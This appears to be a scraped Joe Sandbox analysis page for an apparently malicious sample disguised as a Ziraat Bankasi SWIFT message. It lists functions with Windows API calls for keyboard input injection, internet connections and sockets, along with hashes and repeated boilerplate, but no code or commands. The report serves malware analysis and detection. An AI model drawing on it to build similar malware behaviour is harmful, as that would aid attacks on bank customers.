Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b378f869d588de80619d7999f8c7459fc4e1e19103cb6b8bd7cd2d31fd5cf164
Instruction ID: ecce8c7e62e06efbb950037efee004b193f70f546adb9b60c6d683d8fafdc2c6
Opcode Fuzzy Hash: b378f869d588de80619d7999f8c7459fc4e1e19103cb6b8bd7cd2d31fd5cf164
Instruction Fuzzy Hash: 4241E374A00288EFCB11CF5AD980BADB7F5FF45310F1981A6E814EB261DB30E881CB50

Function 000C3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 000C3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 000C3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 000C3B34
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 000C3B92

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 24e486099a385af126b44b6fe15a9132b5940503bdd8004f26d2e023c842aee6
Instruction ID: b0c3c7a28483137a53e11c17e54d3f453047cc512fe3f4254ae951456d6d4038
Opcode Fuzzy Hash: 24e486099a385af126b44b6fe15a9132b5940503bdd8004f26d2e023c842aee6
Instruction Fuzzy Hash: 0C317330A10258AEEF709BA48819FFE7BF99B45310F04811EE6C1A32D2C7B48F81C761

Function 000B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000B4038
__isleadbyte_l.LIBCMT ref: 000B4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000B40CA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4d0e8951c6a7a6d5a4109be071db1d3782ee144a3e2358555ab2beff9c537dac
Instruction ID: f1ab19c4a076a8d5d81cfccfa795a7f11204d451af3594b0177e8b0bbec7a610
Opcode Fuzzy Hash: 4d0e8951c6a7a6d5a4109be071db1d3782ee144a3e2358555ab2beff9c537dac
Instruction Fuzzy Hash: 0C31C131610216EFDB21AF74C848BFA7BF5FF41310F158428EA658B1A2E771DA91DB90

Function 000CAD49 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000CAD4D
SysFreeString.OLEAUT32(?), ref: 000CADDF

Part of subcall function 000C4340: InterlockedIncrement.KERNEL32(?), ref: 000C4366

VariantClear.OLEAUT32(?), ref: 000CAE35
VariantClear.OLEAUT32(?), ref: 000CAE44

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Variant$Clear$FreeIncrementInitInterlockedString
String ID:
API String ID: 3935303505-0
Opcode ID: 7a3dea8ef44563ccf0bcc948460787e350f4f632dcc77d7f0bf2a7216a18d181
Instruction ID: b403c6bafd6823642a8387b9b1905f1c60b93279a63caef0476775c252c5bb6d
Opcode Fuzzy Hash: 7a3dea8ef44563ccf0bcc948460787e350f4f632dcc77d7f0bf2a7216a18d181
Instruction Fuzzy Hash: EF31C871A0010A9BCF249FA4D454FBEB7F9FF85324B14811AE406DB681DF78C801DBA2

Function 000EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetCursorPos.USER32(?), ref: 000EF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FE4C0,?,?,?,?,?), ref: 000EF226
GetCursorPos.USER32(?), ref: 000EF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FE4C0,?,?,?), ref: 000EF2A6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eebcb59849d7be944ac3a199605b3ded504ba50af58c3ea13bf34385190311bd
Instruction ID: 0e48997527d9a1af9b34616a0ccee627dc4fecdf1d9d497bbe3b7a85d0f61cb3
Opcode Fuzzy Hash: eebcb59849d7be944ac3a199605b3ded504ba50af58c3ea13bf34385190311bd
Instruction Fuzzy Hash: 3321B139600018BFCB258F95DC58EFE7BB5EF4A310F048069FA05572A1D3B09D90DB50

Function 000D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4358

Part of subcall function 000D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4401
Part of subcall function 000D43E2: InternetCloseHandle.WININET(00000000), ref: 000D449E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: aaaa712167c989342fa1f42548ef10cad039d02311d2a2177133e4849701bc6f
Instruction ID: 77fa48a08e68464b20123dd23f5bf817921cbb157f41db8135dcc4937ccfc3d6
Opcode Fuzzy Hash: aaaa712167c989342fa1f42548ef10cad039d02311d2a2177133e4849701bc6f
Instruction Fuzzy Hash: 9B21D131200701BBEB219FA49C01FBBBBE9FF48714F04401BFA5596750DBB199219BB0

Function 000D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 000D8AFF
WSAGetLastError.WSOCK32(00000000), ref: 000D8B16

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 00f59ce342a73b5093fb57ac478cbf1fe55f2469a02f0b106f8650388253fa1a
Instruction ID: 622d9d6956f61fd4d330ca74c40866e01e68928bdb1aa1b2aebcd2623ac7e7a4
Opcode Fuzzy Hash: 00f59ce342a73b5093fb57ac478cbf1fe55f2469a02f0b106f8650388253fa1a
Instruction Fuzzy Hash: F9216672A001249FC7119F69D895ADE7BFCEF49364F00816AF849D7291DB74D9818FA0

Function 000C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?), ref: 000C1E77
Part of subcall function 000C1E68: lstrcpyW.KERNEL32(00000000,?,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C1E9D
Part of subcall function 000C1E68: lstrcmpiW.KERNEL32(00000000,?,000C0ABB,?,?,?,000C187A,00000000,000000EF,00000119,?,?), ref: 000C1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0AD4
lstrcpyW.KERNEL32(00000000,?,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,000C187A,00000000,000000EF,00000119,?,?,00000000), ref: 000C0B2E

Strings

cdecl, xrefs: 000C0B25

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: d67e927aa1398f267388b6141687771f4018400cc6680bfc6ec6960ece746581
Instruction ID: 1e785d026b8cf406455594b06e2c40840d1060dbd9a52d4056115607a81c8950
Opcode Fuzzy Hash: d67e927aa1398f267388b6141687771f4018400cc6680bfc6ec6960ece746581
Instruction Fuzzy Hash: 1F118E36200305EFDB25AF64DC45EBE77E8FF49354B80406AF906CB2A1EB719850D7A1

Function 000B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000B2FB5

Part of subcall function 000A395C: __FF_MSGBANNER.LIBCMT ref: 000A3973
Part of subcall function 000A395C: __NMSG_WRITE.LIBCMT ref: 000A397A
Part of subcall function 000A395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 15d2bc74567129d1a411bcb0cde56028908ed15de2f125d1e580a10f91346e47
Instruction ID: ff2ee9eba85c1b56483c0325e1ae6dd6b52721f09e16efc6d1492276cd76537b
Opcode Fuzzy Hash: 15d2bc74567129d1a411bcb0cde56028908ed15de2f125d1e580a10f91346e47
Instruction Fuzzy Hash: D011C632509216ABDB363BF4FC157EA3BE4AF09370F308539F94D9A152DB74C9809A90

Function 0009EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0009EBB2

Part of subcall function 000851AF: _memset.LIBCMT ref: 0008522F
Part of subcall function 000851AF: _wcscpy.LIBCMT ref: 00085283
Part of subcall function 000851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00085293

KillTimer.USER32(?,00000001,?,?), ref: 0009EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0009EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F3C88

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 5e03ba5de28b753cea2009e5d71e54589da6ace6c3fbaef20f9266e075cb38cf
Instruction ID: cc493ba90c0ff38a4b28fd6a0e5260ea2f2c6c74fb416da14a8dca541208e790
Opcode Fuzzy Hash: 5e03ba5de28b753cea2009e5d71e54589da6ace6c3fbaef20f9266e075cb38cf
Instruction Fuzzy Hash: F121F570504784AFEB72DB28C859BEBBBEC9B01318F04008DE3DA57242C3B06A859B51

Function 000C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000C05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000C05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000C05DD
FreeLibrary.KERNEL32(?), ref: 000C0632

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: af22a3388adef6f0c77328b917bde2629f98b402e75ac73441f382539f4526be
Instruction ID: 6b34434a556fc9cf7a65462224bd39192c8bc45848c583a316d04b023395c14f
Opcode Fuzzy Hash: af22a3388adef6f0c77328b917bde2629f98b402e75ac73441f382539f4526be
Instruction Fuzzy Hash: C7216771900209EBDB20CF91EC88FDEBBB8EF40700F00846EE556A6450DBB0EA55DF60

Function 000C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000C6733
_memset.LIBCMT ref: 000C6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000C67A6
CloseHandle.KERNEL32(00000000), ref: 000C67AF

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 01a4be2b58a354225dd47af4569ec5760600e1e02fcda564f846d573376c2dfb
Instruction ID: 018f8074e3924b6ba1fb5163c439cafd89242d2ddad3329375d1173524c3b99d
Opcode Fuzzy Hash: 01a4be2b58a354225dd47af4569ec5760600e1e02fcda564f846d573376c2dfb
Instruction Fuzzy Hash: D7110A729012287AE73057A5AC4DFEFBABCEF44724F10469AF504E71C0D6744E808B64

Function 000BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 000BB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BB4DB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 98382f0df5f37edd1fd2c52a6f98e6e664e64999220217809f8d050c8387e6da
Instruction ID: 7b9f518c753e216d7114a0ac3b71b001b0364ba0c2701dc80868a05fa0b74468
Opcode Fuzzy Hash: 98382f0df5f37edd1fd2c52a6f98e6e664e64999220217809f8d050c8387e6da
Instruction Fuzzy Hash: 84112A7A900218FFDB11DFA9C985EDDBBB4FB08710F204091E604B7295D7B1AE11DB94

Function 0009B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0009B5A5
GetClientRect.USER32(?,?), ref: 000FE69A
GetCursorPos.USER32(?), ref: 000FE6A4
ScreenToClient.USER32(?,?), ref: 000FE6AF

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 71042d1e8ddbaed61a73724b2493b242753ef756a91003e86bf55a5bd09adbea
Instruction ID: c5fc556795cf519424fde752c274fc25dee5a4a95c7670da0935105dc435f83d
Opcode Fuzzy Hash: 71042d1e8ddbaed61a73724b2493b242753ef756a91003e86bf55a5bd09adbea
Instruction Fuzzy Hash: AD11333190002AFFCF10EF98EE85AEE7BB9EF09314F410451E942E7551D770AA81EBA1

Function 000C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000C7352
MessageBoxW.USER32(?,?,?,?), ref: 000C7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000C739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000C73A2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: f3a96ae1b0c31181abf261363a255323f6a8835bd200f84bc1d2dc175f5cf3e5
Instruction ID: 82b27ac1f9c87a6fbf476b257dc9f73f3e31b9ca2884ff50ef6bd6d1c2e7d2ad
Opcode Fuzzy Hash: f3a96ae1b0c31181abf261363a255323f6a8835bd200f84bc1d2dc175f5cf3e5
Instruction Fuzzy Hash: E211C476A04254BFC7019BACEC09F9E7BEDAB45324F144359FD25D32A1D6B08E409BA1

Function 0009D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009D1BA
GetStockObject.GDI32(00000011), ref: 0009D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0009D1D8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 67a4956176500e2f3d4e730464731900936344d4a9dfc0763306d3d6d78580c0
Instruction ID: 1a57d3b775fde840b6951b1838483dc887ab79f88c8c3ab18f7fad724f4e4385
Opcode Fuzzy Hash: 67a4956176500e2f3d4e730464731900936344d4a9dfc0763306d3d6d78580c0
Instruction Fuzzy Hash: 7411CC73141509BFEF124FA0EC50EEABBAAFF09368F050112FA1552060D772DCA0EBA0

Function 000C3F9B Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 000C3FB8
Sleep.KERNEL32(00000000), ref: 000C3FDD
QueryPerformanceCounter.KERNEL32(?), ref: 000C3FE7
Sleep.KERNEL32(?), ref: 000C401A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 1d512290fa340eb113fb38fb2c7aac70813dc283791ccab19988bfa27243084f
Instruction ID: 7664a6919db4ae687f3ec2ec7ca885edd8de1b46a01ac9d61cd3de8e3cf4678f
Opcode Fuzzy Hash: 1d512290fa340eb113fb38fb2c7aac70813dc283791ccab19988bfa27243084f
Instruction Fuzzy Hash: DD115E31D0061DEBCF109FE4E849BEEBB74FF08701F114059EA41B6180CB7096A1DB95

Function 000B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 000B4E16

Part of subcall function 000B54F5: __fltout2.LIBCMT ref: 000B551E

__cftog_l.LIBCMT ref: 000B4E3C
__cftoe_l.LIBCMT ref: 000B4E6E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
